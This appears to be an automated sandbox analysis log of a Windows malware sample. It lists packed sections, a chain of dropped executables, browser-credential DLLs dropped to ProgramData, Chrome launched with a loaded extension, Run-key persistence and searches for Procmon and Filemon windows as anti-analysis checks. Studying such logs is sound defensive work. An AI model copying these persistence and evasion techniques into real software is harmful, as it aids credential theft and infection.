                              Source: Bunifu_UI_v1.5.3.dll.31.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                              Source: random[2].exe0.5.drStatic PE information: real checksum: 0x44582f should be: 0x447676
                              Source: cd2469328d.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                              Source: b6638733e4.exe.5.drStatic PE information: real checksum: 0x44582f should be: 0x447676
                              Source: 7z.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                              Source: graph.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x46f82
                              Source: random[4].exe.5.drStatic PE information: real checksum: 0x1c78f1 should be: 0x1c6c54
                              Source: random[3].exe2.5.drStatic PE information: real checksum: 0x2b47d9 should be: 0x2b698f
                              Source: c9d0f96e57.exe.5.drStatic PE information: real checksum: 0x1e0ac5 should be: 0x1dfe7b
                              Source: soft[1].31.drStatic PE information: real checksum: 0x0 should be: 0x170243
                              Source: random[2].exe1.5.drStatic PE information: real checksum: 0x444939 should be: 0x441c4a
                              Source: skotes.exe.0.drStatic PE information: real checksum: 0x31f491 should be: 0x322e86
                              Source: Y-Cleaner.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x170243
                              Source: random[2].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                              Source: cc6b47fc15.exe.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                              Source: cc6f25572f.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                              Source: dll[1].31.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                              Source: Gxtuum.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x7aa07
                              Source: b05c9e01f3.exe.5.drStatic PE information: real checksum: 0x444939 should be: 0x441c4a
                              Source: random[3].exe1.5.drStatic PE information: real checksum: 0x2e060a should be: 0x2d75b0
                              Source: 35f0a75b93.exe.5.drStatic PE information: real checksum: 0x2e060a should be: 0x2d75b0
                              Source: 7z.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                              Source: random[1].exe2.5.drStatic PE information: real checksum: 0x0 should be: 0x7aa07
                              Source: 54682ac64c.exe.5.drStatic PE information: real checksum: 0x2b47d9 should be: 0x2b698f
                              Source: 5cda6c90d7.exe.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                              Source: 7739517025.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x7aa07
                              Source: file.exeStatic PE information: real checksum: 0x31f491 should be: 0x322e86
                              Source: 142c991362.exe.5.drStatic PE information: real checksum: 0x1c78f1 should be: 0x1c6c54
                              Source: random[2].exe2.5.drStatic PE information: real checksum: 0x1e0ac5 should be: 0x1dfe7b
                              Source: random[1].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: file.exeStatic PE information: section name: dblbhqnk
                              Source: file.exeStatic PE information: section name: rrjzixml
                              Source: file.exeStatic PE information: section name: .taggant
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name: dblbhqnk
                              Source: skotes.exe.0.drStatic PE information: section name: rrjzixml
                              Source: skotes.exe.0.drStatic PE information: section name: .taggant
                              Source: random[1].exe.5.drStatic PE information: section name: .fptable
                              Source: af155ed129.exe.5.drStatic PE information: section name: .fptable
                              Source: random[1].exe1.5.drStatic PE information: section name:
                              Source: random[1].exe1.5.drStatic PE information: section name: .idata
                              Source: random[1].exe1.5.drStatic PE information: section name:
                              Source: random[1].exe1.5.drStatic PE information: section name: wekcazbo
                              Source: random[1].exe1.5.drStatic PE information: section name: ttllozcv
                              Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name:
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: .idata
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name:
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: wekcazbo
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: ttllozcv
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: .taggant
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name:
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: .idata
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name:
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: wekcazbo
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: ttllozcv
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: .taggant
                              Source: random[2].exe0.5.drStatic PE information: section name:
                              Source: random[2].exe0.5.drStatic PE information: section name: .idata
                              Source: random[2].exe0.5.drStatic PE information: section name:
                              Source: random[2].exe0.5.drStatic PE information: section name: dsmoqcnp
                              Source: random[2].exe0.5.drStatic PE information: section name: yktdnnda
                              Source: random[2].exe0.5.drStatic PE information: section name: .taggant
                              Source: b6638733e4.exe.5.drStatic PE information: section name:
                              Source: b6638733e4.exe.5.drStatic PE information: section name: .idata
                              Source: b6638733e4.exe.5.drStatic PE information: section name:
                              Source: b6638733e4.exe.5.drStatic PE information: section name: dsmoqcnp
                              Source: b6638733e4.exe.5.drStatic PE information: section name: yktdnnda
                              Source: b6638733e4.exe.5.drStatic PE information: section name: .taggant
                              Source: random[2].exe1.5.drStatic PE information: section name:
                              Source: random[2].exe1.5.drStatic PE information: section name: .idata
                              Source: random[2].exe1.5.drStatic PE information: section name:
                              Source: random[2].exe1.5.drStatic PE information: section name: wasfhoet
                              Source: random[2].exe1.5.drStatic PE information: section name: ygjteyur
                              Source: random[2].exe1.5.drStatic PE information: section name: .taggant
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name:
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: .idata
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name:
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: wasfhoet
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: ygjteyur
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: .taggant
                              Source: random[2].exe2.5.drStatic PE information: section name:
                              Source: random[2].exe2.5.drStatic PE information: section name: .idata
                              Source: random[2].exe2.5.drStatic PE information: section name:
                              Source: random[2].exe2.5.drStatic PE information: section name: tsdsdsrb
                              Source: random[2].exe2.5.drStatic PE information: section name: qtylzonp
                              Source: random[2].exe2.5.drStatic PE information: section name: .taggant
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name:
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: .idata
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name:
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: tsdsdsrb
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: qtylzonp
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: .taggant
                              Source: random[4].exe.5.drStatic PE information: section name:
                              Source: random[4].exe.5.drStatic PE information: section name: .idata
                              Source: random[4].exe.5.drStatic PE information: section name:
                              Source: random[4].exe.5.drStatic PE information: section name: ltyimmoj
                              Source: random[4].exe.5.drStatic PE information: section name: vmbhrkov
                              Source: random[4].exe.5.drStatic PE information: section name: .taggant
                              Source: 142c991362.exe.5.drStatic PE information: section name:
                              Source: 142c991362.exe.5.drStatic PE information: section name: .idata
                              Source: 142c991362.exe.5.drStatic PE information: section name:
                              Source: 142c991362.exe.5.drStatic PE information: section name: ltyimmoj
                              Source: 142c991362.exe.5.drStatic PE information: section name: vmbhrkov
                              Source: 142c991362.exe.5.drStatic PE information: section name: .taggant
                              Source: random[3].exe1.5.drStatic PE information: section name:
                              Source: random[3].exe1.5.drStatic PE information: section name: .idata
                              Source: random[3].exe1.5.drStatic PE information: section name: syphqzjl
                              Source: random[3].exe1.5.drStatic PE information: section name: tdmszgwn
                              Source: random[3].exe1.5.drStatic PE information: section name: .taggant
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name:
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name: .idata
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name: syphqzjl
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name: tdmszgwn
                              Source: 35f0a75b93.exe.5.drStatic PE information: section name: .taggant
                              Source: random[3].exe2.5.drStatic PE information: section name:
                              Source: random[3].exe2.5.drStatic PE information: section name: .idata
                              Source: random[3].exe2.5.drStatic PE information: section name: osxguznn
                              Source: random[3].exe2.5.drStatic PE information: section name: nksckbfu
                              Source: random[3].exe2.5.drStatic PE information: section name: .taggant
                              Source: 54682ac64c.exe.5.drStatic PE information: section name:
                              Source: 54682ac64c.exe.5.drStatic PE information: section name: .idata
                              Source: 54682ac64c.exe.5.drStatic PE information: section name: osxguznn
                              Source: 54682ac64c.exe.5.drStatic PE information: section name: nksckbfu
                              Source: 54682ac64c.exe.5.drStatic PE information: section name: .taggant
                              Source: service123.exe.19.drStatic PE information: section name: .eh_fram
                              Source: CaHNbeclRGcBxNSvHjFX.dll.19.drStatic PE information: section name: .eh_fram
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086D91C push ecx; ret 0_2_0086D92F
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00861359 push es; ret 0_2_0086135A
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009BD91C push ecx; ret 1_2_009BD92F
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0033534A push ecx; ret 8_2_0033535D
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0033534A push ecx; ret 10_2_0033535D
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D96D48 pushad ; retf 11_3_00D96D49
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA11F3 pushad ; iretd 11_3_00DA12B1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA1522 pushfd ; iretd 11_3_00DA1551
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D8C90C pushad ; iretd 11_3_00D8CE19
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D8CEE9 push ebp; retf 11_3_00D8CFE7
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D96D48 pushad ; retf 11_3_00D96D49
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA11F3 pushad ; iretd 11_3_00DA12B1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA1522 pushfd ; iretd 11_3_00DA1551
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA11F3 pushad ; iretd 11_3_00DA12B1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA1522 pushfd ; iretd 11_3_00DA1551
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00D96D48 pushad ; retf 11_3_00D96D49
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA11F3 pushad ; iretd 11_3_00DA12B1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 11_3_00DA1522 pushfd ; iretd 11_3_00DA1551
                              Source: file.exeStatic PE information: section name: entropy: 7.022156452672956
                              Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.022156452672956
                              Source: random[1].exe1.5.drStatic PE information: section name: entropy: 7.980952558000639
                              Source: random[1].exe1.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: entropy: 7.980952558000639
                              Source: 5cda6c90d7.exe.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: entropy: 7.980952558000639
                              Source: cc6b47fc15.exe.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                              Source: random[2].exe0.5.drStatic PE information: section name: dsmoqcnp entropy: 7.955290208617223
                              Source: b6638733e4.exe.5.drStatic PE information: section name: dsmoqcnp entropy: 7.955290208617223
                              Source: random[2].exe1.5.drStatic PE information: section name: wasfhoet entropy: 7.954660871223602
                              Source: b05c9e01f3.exe.5.drStatic PE information: section name: wasfhoet entropy: 7.954660871223602
                              Source: random[2].exe2.5.drStatic PE information: section name: tsdsdsrb entropy: 7.947776160551148
                              Source: c9d0f96e57.exe.5.drStatic PE information: section name: tsdsdsrb entropy: 7.947776160551148
                              Source: random[4].exe.5.drStatic PE information: section name: entropy: 7.972390819276659
                              Source: random[4].exe.5.drStatic PE information: section name: ltyimmoj entropy: 7.953284691458963
                              Source: 142c991362.exe.5.drStatic PE information: section name: entropy: 7.972390819276659
                              Source: 142c991362.exe.5.drStatic PE information: section name: ltyimmoj entropy: 7.953284691458963
                              Source: Y-Cleaner.exe.31.drStatic PE information: section name: .text entropy: 7.918511524700298
                              Source: soft[1].31.drStatic PE information: section name: .text entropy: 7.918511524700298

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\Documents\DBAEGCGCGI.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile created: C:\Users\user\AppData\Local\Temp\MSMQUTWP7M2KT78991EY50.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Bunifu_UI_v1.5.3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile created: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\Documents\DBAEGCGCGI.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile created: C:\Users\user\AppData\Local\Temp\W5BO33UUYQPDZ9CE875CW1XCH.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile created: C:\Users\user\AppData\Local\Temp\RHNKLLDCS2RT92VKR9MYB3VQ90O2X.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
